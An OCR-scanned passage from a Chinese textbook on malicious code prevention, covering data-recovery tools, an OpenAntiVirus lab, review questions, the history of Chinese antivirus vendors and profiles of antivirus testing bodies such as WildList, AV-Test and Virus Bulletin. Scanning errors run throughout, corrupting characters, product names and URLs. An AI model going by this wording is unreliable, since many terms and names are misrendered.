DiskGenius 原名 DiskMan, 是 由 易 数 科技 推出 的 一 款 国 人 自主 开发 的 , 集 数据 恢复 、 
人 磁盘 分 区 管理 、 系 统 备份 与 还 原 功 能 于 一 号 的 软件 工具 。 

DiskGenius 文 持 多 种 情况 下 的 文件 丢失 分 区 丢失 恢复 ; 文 持 文件 预览 ; 文 持 甩 区 编 
辑 、RAID 恢复 等 高 级 数据 恢复 功能 。 其 提供 的 分 区 管理 功能 包括 创建 分 区 、 删 除 分 区 、 格 
式 化 分 区 .无 损 调整 分 区 .隐藏 分 区 、 分 配 盘 符 或 删除 盘 符 等 。 其 提供 的 系统 备份 与 还 原 功 
能 包括 分 区 表 (MBR 或 GPT) 备 份 及 恢复 、 分 区 复制 、 磁 盘 复 制 等 。DiskGenius 还 提供 了 快 
速 分 区 .整数 分 区 、 分 区 表 错 误 检 查 与 修复 . 坏 道 检 测 与 修复 .永久 删除 文件 .虚拟 人 硬盘 与 动 
态 磁 盘 等 其 他 功能 。 

DiskGenius 有 免费 版 .标准 版 与 专业 版 3 个 版 本 。3 个 版 本 共用 同一 个 发 行 包 。 下 载 
后 , 即 可 立即 使 用 免费 版 DiskGenius; 注册 后 ,可 自动 升级 为 标准 版 或 专业 版 。DiskGenius 
的 英文 版 本 名 为 PartitionGuru。 

易 数 科技 还 提供 一 亚 面 向 普通 用 户 的 数据 恢复 专用 软件 一 一 数据 恢复 精灵 。 它 基于 
DiskGenius 内 核 开发 而 成 ,除了 普通 用 户 很 少 接触 的 RAID 恢复 、 加 密 分 区 恢复 等 ,其 数据 
恢复 功能 可 到 达 DiskGenius 软件 的 恢复 效果 。 

4. Recuva 

Recuvag (发 音 同 “recover”, 恢 复 ) 是 由 英国 软件 公司 Piriform 开发 的 Windows 下 的 数 
据 恢复 软件 。 它 可 以 用 来 恢复 那些 被 误 删 除 、 系 统 Bug 或 者 死机 导致 丢失 的 文件 ,也 可 以 
恢复 已 经 清空 的 回收 站 ,只 要 没有 被 重复 写 人 数据 ,能 直接 恢复 硬盘 、 闪 盘 、 存 储 卡 (如 SD 
卡 .MMC 卡 等 ) 中 的 文件 ,无 论 格式 化 还 是 删除 均 可 和 耳 接 恢复 , 文 持 FAT12、FAT16、 
FAT32 .exFAT、NTFS.NTFS5.NTFS 十 EFS ext2 .ext3 、ext4 等 文件 系统 。 

Recuva 的 优点 在 于 操作 简单 .免费 版 本 没有 广告 、 文 持 中 文 ( 虽 然 支 持 效果 差 踢 人意 )。 


@ http://finaldata. com/finaldata-standard/。 
Q@ http://www. eassos. cn/dg/。 


® http://www. piriform. com/recuva。 
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它 还 可 以 将 配置 保存 在 程序 文件 夹 内 为 . ini 文件 ,从 U 盘 运 行 。 
5. PC-3000 


PC-3000 是 由 俄罗斯 著名 硬件 数据 恢复 权威 机 构 ACE Laboratory 研究 开发 的 商用 
数据 恢复 和 硬盘 修复 的 系列 产品 。 它 是 从 硬盘 的 内 部 软件 来 管理 硬盘 ,进行 硬盘 的 原始 资 
料 的 改变 和 修复 。 

PC-3000 功能 强大 ,支持 的 文件 系统 包括 FAT、exFAT、NTFS、EXT2/3/4、HFS 十 、 
UFS1/2、XFS、ReiserFS、VMFS、VHD 等 , 支持 Seagate、Western Digital、Fujitsu、 
Samsung、, Maxtor, Quantum、 IBM (HGST)., HITACHI, TOSHIBA, OCZ, Corsalr, A- 
DATA、Micron、Plextor、SanDisk、Kingston 等 众多 厂商 的 便 件 产品 ,是 许多 从 事 数据 恢复 、 
司法 取证 工作 的 专业 公司 的 必 备 工具 。 

PC-3000 系列 产品 分 别 面 回 人 硬盘 、RAID 闪存、 固态 便 盘 (Solid State Drives) 提供 了 对 
应 的 解决 方案 。 与 其 他 产品 不 同 的 是 : PC-3000 的 数据 恢复 解决 方案 是 软 硬 件 一 体 的 ,不 
仅 包 括 用 于 问题 诊断 .数据 恢复 的 软件 ,也 包括 相应 的 人 硬件 设备 。 针 对 用 户 在 修复 时 间 、 修 
复 能 力 、 修 复数 量 、 修 复 地 点 等 方面 的 不 同 需求 ,他 们 提供 了 PC-3000 Express、PC-3000 
UDMA 、PC-3000 Portable 等 多 种 硬件 平台 选择 。 


10.9 综合 实验 
综合 实验 十 一 : 恶意 代码 检测 实验 (OAV) 


【实验 目的 】 

(1) 掌握 OpenAntiVirus 使 用 方法 。 

(2) 掌握 PatternFinder 使 用 方法 。 

(3) 掌握 VirusHammer 的 使 用 方法 。 

【能 力 提 升 】 

在 掌握 本 章 设 计 实验 的 基础 上 ,有 富余 时 间 的 高 校 可 以 要 求学 生 在 OpenAntiVirus 的 
源 代码 方面 做 一 些 修改 工作 ,以 提升 能 力 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) Linux Fedora 9 。 

(3) Java JDK.: JDK 1.6, 

(4) ScannerDaemon-0. 6. 0。 

(5) PatternFinder-0. 7. 2。 

(6) VirusHammer-0. 1. 1 。 

【实验 步骤 】 

详细 参考 附 书 电子 资源 。 


QD http://www. acelaboratory. comy/ 。 
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【实验 素材 】 
解压 目录 \comprehensive\Ch1l10\。 


10. 10“ 习 是 


一 、 填 空 题 
1. 比较 法 是 恶意 代码 诊断 的 重要 方法 之 一 ,计算 机 安全 工作 者 常用 的 比较 法 包 
括 i 和 


2. 病毒 扫描 软件 由 两 部 分 组 成 : 一 部 分 是 ,含有 经 过 特别 选 定 的 各 种 恶意 代 
码 的 特征 串 ; 男 一 部 分 是 ,负责 在 程序 中 查找 这 些 特征 串 。 

二 、 选 择 题 

从 技术 角度 讲 ,数据 备份 的 策略 主要 包括 ( ) ) 和 ( ) 。 

A. 完全 备份 B. 差别 备份 

C. 增 量 备份 D. 差分 备份 

三 、 思 考题 


1. 说 明 恶 意 代 码 检测 的 基本 原理 ,和 常用 的 检测 方法 有 哪些 ? 
2. 举例 说 明 采 用 特征 代码 扫 摘 法 进行 恶意 代码 检测 的 过 程 。 
3. 恶意 代码 的 清除 难度 远 远 大 于 检测 的 难度 ,请 说 明 原 因 。 
4. 根据 本 书 的 内 容 , 探 讨 防范 恶意 代码 的 六 部 分 内 容 。 


第 11 革 第 用 杀毒 软件 及 其 
解决 方案 


随 着 数字 技术 及 Internet 技术 的 日 益 发 展 ,恶意 代码 攻击 技术 也 在 不 断 发 展 提 高 。 恶 
意 代 码 的 传播 途径 越 来 越 多 ,传播 速度 越 来 越 快 ,造成 的 危害 越 来 越 大 ,几乎 到 了 令 人 防 不 
胜 防 的 地 步 。 企 业 在 建立 了 网 络 系统 后 ,急需 一 个 切实 可 行 的 解决 方案 , 既 要 确保 整个 企业 
的 业务 数据 不 受到 恶意 代码 的 破坏 ,又 要 保障 日 常 工 作 不 受 亚 意 代码 的 侵扰 。 

本 章 首 先 介绍 国内 外 著名 的 反 病 毒 软件 评测 机 构 , 以 及 国内 经 常 使 用 的 多 款 杀 毒 软件 ， 
其 次 介绍 企业 网 络 的 典型 结构 、 典 型 应 用 、 网 络 时 代 的 恶意 代码 特征 ,最 后 给 出 企业 网 络 结 
构 对 恶意 代码 防范 技术 和 工具 的 需求 ,从 而 给 出 一 些 针 对 典型 恶意 代码 的 防治 方案 。 

本 章 学 习 目 标 

(1) 了 解 国内 外 恶意 代码 防范 产业 发 展 历史 。 

(2) 了 解 国内 外 反 病 毒 软件 评测 机 构 。 

(3) 了 解 国内 外 著名 杀毒 软件 。 

(4) 掌握 恶意 代码 防治 解决 方案 。 


11.1 恶意 代码 防范 产业 发 展 


在 全 球 恶 意 代 码 防范 产业 发 展 的 历史 上 ,早期 曾经 出 现 了 一 大 批 有 影 啊 力 的 恶意 代码 
防范 软件 ,如 Anti-virus collection (V. Bontchev)、F-Prot, File Shiled (McAfee) NOD of 
Slovak AV 、TbsScan、AVP (上 Kaspersky) 、 Dr. Web (lgor Danlloff)、Norton AV. Solomon s 
Toolkit、IBM Ant-Virus 等 。 

在 恶意 代码 防范 产业 发 展 的 早期 ,主要 集中 在 传统 计算 机 病毒 的 防治 软件 开发 方面 。 在 
我 国 ,也 是 以 防范 传统 计算 机 病毒 的 杀毒 软件 为 主 。 下 面 介 绍 我 国 杀 毒 软件 的 发 展 过 程 2。 

1988 年 ,引导 区 型 病毒 “小 球 ” 和 “石头 ”开始 在 中 国 流行 。 之 后 ,计算 机 新 病毒 不 断 出 
现 。 当 时 国内 并 没有 专门 的 企业 和 管理 部 门 , 只 能 徘 一 些 程序 员 防 范 计算 机 病毒 。 

1989 年 7 月 ,中 国 公安 部 计算 机 管理 监察 局 监察 处 病毒 研究 小 组 编制 出 了 中 国 最 早 的 
杀毒 软件 Kill 6.0。 这 一 版 本 可 以 检测 和 清除 当时 在 国内 出 现 的 6 种 病毒 。Kill 杀毒 软件 
在 随后 的 很 长 一 段 时 间 内 一 百 由 公安 部 免费 发 放 。 

1990 年 ,深圳 华星 公司 推出 了 一 种 硬件 反 病 毒 工具 , 即 华星 防 病毒 卡 , 这 是 世界 上 最 嘻 
的 一 块 防 病毒 卡 。 在 那个 年 代 , 用 户 对 计算 机 还 缺乏 足够 的 了 解 ,认为 磁盘 上 的 东西 不 值 
钱 , 只 有 计算 机 中 看 得 见 、 摸 得 着 的 硬件 设备 才 值 得 花 钱 买 。 市 场 一 度 被 这 种 价值 观念 所 引 
导 , 这 也 使 华星 防 病毒 卡 获 得 了 很 好 的 销售 业绩 。 


@ 瑞星 : 中 国 反 病毒 产业 发 展 概述 ,http://edu. rising. com. cn。 
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1991 年 ,计算 机 病毒 的 数量 持续 上 升 ,在 这 一 年 已 经 发 展 到 几 百 种 ,杀毒 软件 这 一 行业 
也 日 益 活 跃 。 同 年 ,美国 Symantec 公司 开始 推出 杀毒 软件 ,同年 11 月 ,北京 瑞星 公司 成 立 ， 
并 推出 便 件 防 病毒 系统 , 即 琪 星 防 病毒 卡 。 随 后 的 几 年 ,病毒 数量 和 技术 不 断 提高 ,频繁 的 
升级 需要 严重 制约 了 这 类 防 病毒 卡 的 进一步 发 展 , 便 件 防范 工具 慢 慢 退出 了 历史 舞台 。 

1993 年 上 半年 ,微软 发 行 了 日 已 的 反 病 毒 软件 一 一 微软 反 病 毒 软件 (MSAV)。MSAYV 
是 微软 购买 了 另 一 家 公司 的 CPAV 杀毒 软件 后 推出 的 ,但 不 久 后 就 放弃 了 。 同 年 6 月 ,中 
国 公 安 部 正式 决定 以 金 展 安全 技术 实业 公司 的 名 义 进行 Kill 的 商品 化 推广 。 

1993 年 冬 ,美国 Trend Micro( 趋 势 科 技 ) 成 立 了 趋势 科技 北京 分 公司 ,开始 推广 趋势 的 
PC-cillin。 然 而 ,坚持 了 不 到 两 年 ,这 个 分 公司 就 关 掉 了 。2001 年 8 月 ,趋势 科技 重新 成 立 
了 中 国 分 公司 ,在 北京 上海 和 广州 设立 了 分 部 ,开始 在 国内 市 场 主打 网 关 防 毒 产 品 。 

1994 年 , 王 江 民 编制 “RV100” 杀 毒 软件 ,并 以 20 000 元 的 价格 转让 了 销售 许可 ,其 推广 
名 为 “超级 巡警 ”"。 一 年 后 ,KV100 升级 为 KV200, 并 和 北京 华星 合作 ,营销 取得 成 功 。 

1997 年 ,南京 信 源 公司 首次 推出 具有 实时 监控 功能 的 病毒 防火 墙 。 同 年 ,华美 星际 推 
出 六 病毒 克星 ”。 

1998 年 ,瑞星 公司 依 徘 OEM 策略 ,先后 与 方正 、 联 想 、 同 创 、 浪 潮 、 实 达 等 计算 机 生产 
商 达 成 合作 协议 ,捆绑 销售 其 杀毒 软件 ,获得 了 市 场 成 功 。 到 1998 年 年 底 为 止 , 瑞 星 杀 毒 软 
件 已 经 尽 人 篆 知 。 

1998 年 ,南京 信 源 开始 分 家 ,先是 划分 成 北方 市 场 和 南方 市 场 分 别 经 营 , 然 后 由 于 市 场 
和 经 营 理 念 的 冲突 及 公司 内 部 的 予 盾 ,开始 相互 起 诉 和 争斗 ,两 家 公司 因此 元 气 大 伤 ,市 场 
份额 和 影响 力 急剧 下 降 。 

1998 年 5 月 ,中 国 金 展 安 全 技术 实业 公司 和 美国 CA 公司 共同 合资 成 立 北京 告 群 金 撒 
软件 有 限 公 司 ,同时 宣布 在 北京 成 立 产 品 研 发 中 心 。1998 年 7 月 ,和 冠 群 金 展 公司 发 布 Kill 
认证 版 。 该 产品 虽然 还 称 为 Kill ,但 核心 技术 已 经 完全 转换 为 CA 公司 的 技术 。 

1999 年 6 月 ,金山 公司 首次 发 布 金山 毒霸 的 测试 版 ,开始 符 试 进入 杀毒 软件 市 场 。 
2000 年 11 月 ,金山 毒霸 正式 进入 恶意 代码 防范 软件 市 场 。 

2000 年 前 ,北京 时 代 先 锋 推 出 了 “ 行 天 98? 杀 毒 软件 ,但 不 久 即 退出 市 场 。 其 间 ,交大 铭 泰 
公司 推出 的 东方 卫士 也 曾经 在 杀毒 市 场 上 风光 一 时 ,但 由 于 种 种 原因 ,逐渐 退出 了 杀毒 市 场 。 

奇 虎 公司 创立 于 2005 年 9 月 ,并 于 2006 年 7 月 推出 了 专门 查 杀 流氓 软件 的 360 安全 
卫士 (www. 360. cn) 。 经 过 不 断 的 改进 和 升级 ,截至 2009 年 年 底 ,360 安全 卫士 已 发 展 成 为 
最 受 网 民 欢 迎 的 集 查 杀 木马 、 防 盗号 .漏洞 管理 等 功能 为 一 体 的 安全 工具 软件 ,拥有 1. 6 亿 
用 户 , 网 民 和 覆盖 率 超过 60% 。 此 后 , 奇 虎 公司 还 推出 了 360 安全 浏览 器 、360 保险 箱 等 系列 
产品 ,并 完全 免费 。 


11.2 国内 外 反 病 每 软件 评测 机 构 


在 网 站 或 杀毒 软件 产品 的 宣传 资料 上 看 到 的 各 种 杀毒 软件 的 评测 和 自我 宣传 ,经 常会 
谈 及 一 些 软件 评测 机 构 ,那么 哪些 评测 机 构 是 最 权威 的 呢 ? 它们 的 评测 依据 是 什么 ? 为 什 
么 会 被 用 户 认可 呢 ? 
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本 节 介 绍 维护 全 球 恶 意 代 码 库 的 著名 机 构 WildList 和 AMTSO, 以 及 全 球 权威 评 
测 机 构 一 一 AV-test、Virus Bulletin、AV-Comparatives ICSA ,最 后 介绍 恶意 代码 防范 产品 
在 中 国 的 市 场 准 入 评测 机 构 。 

需要 说 明 的 是 ,WildList 和 AMTSO 只 提供 恶意 代码 样本 ,本 和 号 并 不 进行 任何 测试 ; 各 
权威 评测 机 构 都 是 由 民间 自发 组 织 , 并 独立 存在 的 ,与 厂商 及 政府 间 没 有 任何 利益 关系 ,也 
不 收取 任何 被 测试 三 商 的 赞助 费 。 这 样 的 方式 保证 了 各 自 的 独立 性 。 


11.2.1 WildList 


阅读 有 关 恶 意 代 码 防范 技术 的 文章 时 ,经 常会 看 到 WildList 这 个 词 ,事实 上 它 就 是 由 
WildList 提供 的 恶意 代码 清单 。 

WildList Organization2 于 1993 年 7 月 由 反 病 毒 研究 者 Joe Wells 所 创办 ,其 目的 是 跟 
踪 那 些 现实 世界 中 传播 的 恶意 软件 。 现 在 约 有 80 名 顶尖 防 病毒 研究 人 员 参 与 其 中 工作 ,并 
每 月 重新 修订 该 清单 并 回 外 发 布 。 该 机 构 在 成 立 之 初 便 整理 了 当时 多 份 病毒 清单 报告 ,并 
把 该 报告 交 巾 几 位 亚 意 代码 防范 专家 作 参 考 , 之 后 还 参与 了 对 遗漏 部 分 的 修改 与 补充 。 该 
清单 公布 后 不 久 , WildList 即 成 为 业界 用 以 测试 与 认识 产品 的 重要 标准 。WildList 成 立 的 
目的 并 不 是 进行 反 病 毒 产品 的 评测 ,而 是 为 其 他 评测 机 构 提 供 最 准确 的 恶意 代码 清单 或 样 
本 ,因而 倍 受 评测 机 构 或 研究 机 构 推 尝 。 

目前 ,WildList 是 全 球 主要 恶意 代码 信息 的 提供 者 , 它 所 提供 的 WildList 列表 包含 了 
当时 有 实际 感染 和 传播 行为 而 被 发 现 的 恶意 代码 ,来 自 于 全 球 权威 组 织 与 专家 。 该 
WildList 对 恶意 代码 的 收录 采取 非常 严谨 的 态度 ,首先 必须 有 两 位 或 两 位 以 上 的 恶意 代码 
专家 回访 机构 报告 发 现 该 款 恶 意 代码 , 且 该 报告 必须 附 有 恶意 代码 的 样 例 ,才能 列 入 清单 
中 。WildList 的 收集 过 程 虽 然 较 慢 ,但 可 确保 所 有 收录 的 恶意 代码 都 是 确实 存在 并 具有 破 
坏 性 ,日 实际 发 生 过 感染 。WildList 列表 可 供 业 界 所 有 成 员 分 享 。 

由 于 该 组 织 是 各 种 评测 机 构 进 行 评测 时 的 主要 恶意 代码 样本 来 源 ,而 自身 不 进行 评测 ， 
青 加 上 其 大 而 全 面 的 恶意 代码 库 , 因 此 被 各 组 织 机 构 和 专业 人 土 一 致 推举 为 最 公平 的 组 织 。 
虽然 不 进行 评测 ,但 它 地 位 非常 高 ,在 恶意 代码 防范 行业 内 的 影响 力也 极其 深远 ,很 多 厂商 
都 要 寻求 和 它 交 换 恶 意 代 码 样本 。 可 以 说 , WildList 是 恶意 代码 防范 行业 不 可 或 缺 的 资 
料 库 。 

2002 年 WildList Organization 并 入 ICSA (JInternational Computer Security Association， 
国际 计算 机 安全 协会 ) 。 


11.2.2 AMTSO 


AMTSO(CAnti-Malware Testing Standards Organization, 反 恶意 软件 测试 标准 组 织 )% 
成 立 于 2008 年 ,是 一 个 国际 性 非 萤 利 组 织 ,致力 于 研究 反 恶 意 软件 测试 方法 ,以 提高 测试 的 
客观 性 和 准确 性 。 它 的 成 员 单位 目前 已 超过 50 家 ,包括 反 恶 意 软 件 企 业 .权威 评测 机 构 、 相 
关 供 应 商 企 业 等 。AV-Comparatives\AV-Test ICSA Labs、Virus Bulletin 等 独立 测试 机 构 


DO Wildlist Organization International, http://www. wildlist. org。 
©@ AMTSO, http://www.amtso. org/ 。 
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都 在 其 中 。 

AMTSO 的 主要 工作 包括 : 为 讨论 反 恶 意 软 件 及 其 相关 产品 的 测试 工作 提供 交流 平 
台 ; 开发 和 宣传 反 恶 意 软件 及 其 相关 产品 测试 的 客观 标准 和 最 佳 实践 ; 促进 对 反 恶 意 软 件 
及 其 相关 产品 测试 的 教育 和 认识 ; 为 基于 标准 的 测试 方法 提供 工具 和 资源 。 

AMTSO 发 布 了 一 系列 与 反 恶 意 软件 产品 和 解决 方案 相关 的 操作 指南 和 最 佳 实践 文 
档 。2017 年 5 月 ,AMTSO 还 提出 了 反 恶 意 软 件 测试 协议 标准 草案 (Testing Protocol 
Standards for the Testing of Anti-Malware Solutions) ,为 测试 人 员 和 供应 商 提 供与 反 恶 意 
软件 测试 相关 的 行为 和 信息 标准 。 

AMTSO 建立 和 维护 了 一 个 恶意 软件 样本 库 一 一 实时 威胁 列表 (Real-Time Threat 
List,RTTL) ,样本 由 世界 各 地 的 反 恶 意 软 件 公 司 和 反 恶 意 软 件 专家 提交 。AMTSO 通过 
RTTL 提供 公用 平台 。 测 试 人 员 可 在 该 平台 上 获得 恶意 软件 样本 ,以 及 厂商 和 人 研究 人 员 提 
供 的 相关 监测 数据 ,从 而 为 测试 人 员 提 供 基于 不 同 攻 击 频 率 和 地 区 差异 的 恶意 软件 样本 进 
行 测试 。 同 时 ,相关 研究 人 员 也 可 以 利用 该 平台 进行 学 术 人 研究 或 趋势 分 析 。 


11.2.3 AV-Test 


AV-Test 起 源 于 德国 马 德 保 大 学 和 AV-Test GmbH 共同 合作 的 研究 计划 ,各 项 反 病 
毒 测 试 是 由 技术 与 商业 信息 系统 学 院 (Institute of Technical and Business Information 
systems) 的 商业 信息 系统 团队 在 研究 实验 室 进行 的 。2004 年 ,Andreas Marx、Oliver Marx 
和 Guido Habicht 在 马 德 堡 创 立 AV-Test 反 病 毒 测 试 有 限 责 任 公 司 。 

作为 国际 权威 的 第 三 方 独立 测试 机 构 之 一 , AV-Test 定期 采用 海量 样本 库 ( 大 于 100 
万 种 的 恶意 代码 样本 库 ) 进 行 目 动 测试 ,这 种 方式 可 以 极 大 地 减少 人 为 因素 对 测试 结果 的 干 
扰 ,其 测试 结果 被 国际 安全 界 公 认为 独立 客观 。 

目前 ,AV-Test 每 两 个 月 进行 一 次 测评 。 他 们 将 日 主 地 选择 当下 常用 的 恶意 代码 查 杀 
产品 进行 测评 ,包括 家 用 产品 和 企业 级 解决 方案 。 其 中 ,由 于 企业 级 解决 方案 的 应 用 环境 较 
为 复杂 且 具 有 多 样 性 ,AV-Test 一 般 选 择 在 厂商 推荐 的 配置 方案 下 进行 测评 。AV-Test 能 
在 多 个 平台 上 对 产品 进行 全 面 测 试 ,测试 内 容 包 括 ( 但 不 限于 ) 恶 意 代码 爆发 测试 .压缩 档案 
测试 、 对 海量 恶意 代码 样本 的 按 需 扫 描 与 党 驻防 护 测试 ItW (in the wild, 日 动 散 播 型 ) 恶 意 
代码 测试 . 扫 摘 速度 测试 .系统 性 能 影 啊 测 试 等 。 测 评 项 目 分 为 防护 .修复 和 易 用 性 3 项 ,每 
个 项 目 满分 为 6 分 ,总 分 为 18 分 。 总 分 超过 10 分 , 且 单 项 成 绩 至 少 1 分 的 产品 方 能 通过 评 
测 。 其 中 ,家 用 产品 获得 AV-Test CERTIFIED 认证 ,企业 级 解决 方案 (产品 ) 获 得 AV-Test 
APPROVED CORPORATE ENDPOINT PROTECTION 认证 。 测 评 结果 均 公 布 在 其 官方 
网 站 上 。 


11.2.4 Virus Bulletin 


Virus Bulletin% 于 1989 年 在 英国 成 立 , 是 国际 最 有 名 、 历 史 最 悠久 的 恶意 代码 测试 机 
构 之 一 。Virus Bulletin 除了 致力 于 提供 给 计算 机 使 用 者 公正 、 客 观 、 独 立 的 防 病毒 相关 信 


® AV-Test, http://www.av-test. org。 


©@ Virus Bulletin, http://www. virusbtn. com。 
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县 外 ,还 定期 出 版 同名 杂志 Virus Bulletin ,主要 以 有 害 软 件 与 垃圾 邮件 防护 .检测 及 清除 为 
题材 ,登载 由 业界 专家 所 写 的 技术 文 曹 ,提供 最 新 恶意 代码 威胁 分 析 ,探索 恶意 代码 防范 领 
域 的 最 新 进展 ,并 提供 恶意 代码 防范 软件 的 详尽 测试 报告 。 同 时 , 它 也 在 世界 各 地 举办 不 同 
题材 的 VB 会 议 (VB Conference) ,给 予 专 业 人 土 肾 在 一 起 讨论 最 新 研究 成 果 与 分 享 新 技术 
的 机 会 。 

Virus Bulletin 开展 包括 恶意 代码 查 杀 垃圾 邮件 过 滤 、 恶 意 网 站 /网 页 过 滤 技术 等 方面 
的 测评 认证 。 其 中 ,VB100 认证 是 对 恶意 代码 查 杀 软件 的 最 高 荣誉 认证 ,着 重 测试 恶意 代 
码 防范 软件 的 病毒 检 出 率 .扫描 速度 及 误 报 率 ; VBSpam 着 重 测试 企业 级 垃圾 邮件 过 滤 技 
术 ; VBWeb 则 关注 于 网 站 网 关 如 何在 不 妨碍 用 户 在 网 上 获取 有 用 资源 的 同时 阻止 访问 和 危 
险 的 网 站 和 网 页 。 

Virus Bulletin 每 两 个 月 便 会 组 织 对 各 大 杀毒 软件 产品 ,在 不 同 的 计算 机 软 人 硬件 平台 
上 ,用 WildList 清单 发 布 的 恶意 代码 新 样本 进行 测试 。 每 次 参与 测试 的 品牌 有 30 种 左右 ， 
只 有 那些 能 够 在 主动 与 被 动 两 种 模式 下 均 能 完全 辨认 出 WildList 清单 中 的 所 有 恶意 代码 ， 
并 在 扫描 过 程 中 没有 任何 误 判 的 防 病毒 软件 ,才能 取得 VB100 认证 。 在 2006 年 到 2008 年 
6 月 发 表 的 测试 报告 中 ,只 有 不 超过 四 分 之 一 的 防 病毒 软件 是 可 以 100% 清 除 样本 恶意 代码 
的 。 例 如 ,2008 年 6 月 只 有 8 家 机 构 取 得 VB100 认证 ,而 在 2006 年 间 曾 经 有 一 个 月 只 有 
4 家 机 构 取 得 VB100 认证 。 

由 于 不 同 产 品 会 随 着 网 络 上 恶意 代码 的 不 断 更 新 而 表现 时 好 时 坏 , 因 此 一 般 应 以 杀毒 
软件 产品 取得 VB100 次 数 的 多 少 来 衡量 其 表现 。 虽 人 然 有 众多 的 厂商 参与 评测 ,但 能 够 连续 
通过 VB100 认证 的 厂商 少 之 又 少 , 其 中 ,NOD32、Kaspersky 和 Norton 是 获奖 次 数 较 多 的 
厂商 。 


11.2.S AV-Comparatives 


AV-Comparativesd (以 下 简称 AVC) 总 部 位 于 奥地利 ,由 Andreas Clementi 在 2003 年 
成 立 。 该 组 织 每 年 不 定期 选择 安全 软件 市 场 中 的 具有 一 定 影响 力 的 安全 产品 ,采用 包括 后 
门 程序 .木马 程序 .邮件 晴 虫 .脚本 病毒 及 其 他 各 类 有 害 程序 在 内 的 数 千 个 病毒 样本 对 杀毒 
软件 的 查 杀 病毒 能 力 ,扫描 速度 、 误 报 率 等 指标 进行 测试 。AVC 每 年 都 会 发 布 固定 的 年 度 
评测 报告 ,评测 报告 中 会 以 客观 角度 指出 各 厂商 杀毒 软件 的 优 缺 点 及 建议 。2017 年 人 选 参 
测 的 广 商 有 21 家 ,其 中 国内 的 腾讯 和 人选。 

目前 ,AVC 的 测试 项 目 包 括 产品 动态 保护 能 力 测试 .恶意 软件 保护 测试 、 性 能 测试 、 启 
发 式 / 行 为 测试 、 误 报 测试 .恶意 软件 清除 测试 .文件 检测 率 测试 、 反 垃圾 邮件 测试 、 反 钓鱼 测 
试 移动 安全 产品 测试 、Mac 安全 产品 评测 .产品 业务 能 力 评 测 .单项 产品 测试 等 。 各 个 测 
试 项 目的 测试 频率 各 不 相同 ,如 产品 动态 测试 的 结果 每 月 公布 一 次 ,半年 进行 一 次 总 结 ; 性 
能 测试 ,文件 检测 率 测试 半年 一 次 等 。 测 试 结果 分 为 四 级 ,由 低 到 高 分 别 为 TESTED、 
STANDARD、ADVANCED 和 ADVANCED 十 。 项 目测 试 结果 及 测试 总 结 等 数据 资料 都 
可 以 在 网 站 上 查看 。 

AVC 一直 致力 于 新 测试 技术 的 开发 ,其 中 ,动态 保护 能 力 测试 模拟 用 户 每 天 的 计算 机 


© AV-Comparatives, http://www.av-comparatives. org/ 。 
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使 用 习惯 和 每 天 的 网 络 环境 下 的 种 种 常见 情况 ,测试 复杂 而 全 面 。 AVC 的 启发 式 /行为 测 
试 (Heuristic / Behaviour Tests) 重 点 在 测试 扫 毒 引擎 对 未 知 病毒 的 侦 测 能 力 上 。 测 试 时 ， 
先 冻 结 防毒 软件 引擎 与 恶意 代码 数据 库 3 个 月 ,并 以 这 3 个 月 内 出 现 的 恶意 代码 新 品种 作 
为 测试 样本 测试 其 检查 新 恶意 代码 的 能 力 。 在 测试 中 ,除了 会 考虑 防 病毒 软件 发 现 的 新 恶 
意 代 码 比例 外 ,还 会 考虑 其 扫 摘 速度 与 恶意 代码 误 判 数量 。2016 年 AV-Comparatives 基于 
AMTSO 的 RTTL 样本 库 , 选 择 了 29 款 PC 端的 恶意 代码 防护 产品 进行 了 两 次 认证 测试 
(Certification Tests) ,评测 结果 需要 检 出 率 达 到 98% 以 上 才能 获得 认证 。 除 ESET Smart 
Security、 Avast Free Antivirus, Kaspersky Internet Security、McAfee Internet Security、 
Symantec Norton Security Premium 等 国外 公司 产品 外 ,我 国 的 Tencent PC Manager 也 两 
次 都 通过 认证 测试 。 


11.2.6 ICSA 实验 室 


ICSA 实验 室 (ICSA Labs)9 是 Verizon 公司 的 下 属 单位 。 作 为 独立 的 检测 机 构 ,ICSA 
提供 网 络 安全 产品 功能 性 和 安全 性 方面 的 认证 ,以 及 网 络 和 系统 管理 人 员 安 全 专业 技术 的 
能 力 认证 。ICSA 的 认证 标准 是 由 咨询 界 的 专家 、 厂 商 及 使 用 者 的 意见 制定 出 来 的 ,以 认证 
项 目的 安全 性 及 功能 性 为 主要 考察 内 容 。ICSA 的 认证 标准 会 随 着 各 项 安全 技术 及 安全 威 
胁 的 不 断 发 展 而 每 年 更 新 ,并 以 更 新 后 的 标准 来 测试 产品 。 男 外 ,如 果 厂 商 之 前 推出 的 产品 
已 经 获得 认证 ,其 之 后 推出 新 球 的 产品 也 会 日 动 得 到 ICSA 的 认证 。 但 是 为 了 确保 新 球 的 
产品 同样 符合 原先 认证 的 标准 ,ICSA 会 与 厂商 签订 条 约 , 要 求 厂商 的 产品 发 展 不 能 违背 原 
先 标 准 。 如 果 ICSA 抽 测 发 现 没 有 符合 原先 认证 的 内 容 , 厂 商会 被 要 求 限期 改善 ,否则 吊销 

凡是 获得 ICSA 实验 室 认 证 的 反 病 毒 产品 在 减少 因 恶 意 代 码 而 引起 的 安全 隐患 方面 ， 
都 可 以 满足 一 系列 的 公众 检验 标准 和 业界 接受 的 规范 。 并 且 ISCA 会 对 得 到 认证 的 产品 进 
行 频率 不 超过 一 个 季度 的 后 续 测 试 , 以 保障 产品 品质 的 持续 性 。 

ICSA 实验 室 在 Internet 网 关 领 域 认 证 的 标准 极其 严格 ,产品 必须 要 100% 检 测 到 当前 
WildList 恶意 代码 列表 中 已 列 出 的 恶意 代码 ; 检测 到 ICSA 宏 病 毒 库 中 90 为 的 病毒 ; 检测 
到 压缩 文件 中 的 恶意 代码 ; 检测 到 以 uuencode 格式 进行 编码 的 电子 邮件 中 的 恶意 代码 ; 检 
测 到 以 MIME 格式 进行 编码 的 电子 邮件 中 的 恶意 代码 ,并 在 扫描 时 能 够 记录 所 有 的 活动 。 

认证 测试 是 由 ICSA 实验 室 或 受过 其 培训 及 授权 的 实验 室 进行 。ICSA 的 评测 对 象 除 
了 恶意 代码 防范 产品 以 外 ,还 包括 几 类 安全 产品 : Firewall( 防 火场 ) 、Secure Internet 
Filtering( 互 联网 安全 过 滤 )、PC Firewall (个 人 防火 场 )、Cryptography (密码 防护 )、 
Intrusion Detection( 和 人 侵 检 测 )、IP Sec( 网 络 安全 协议 )、Web Applications (Web 应 用 )、 
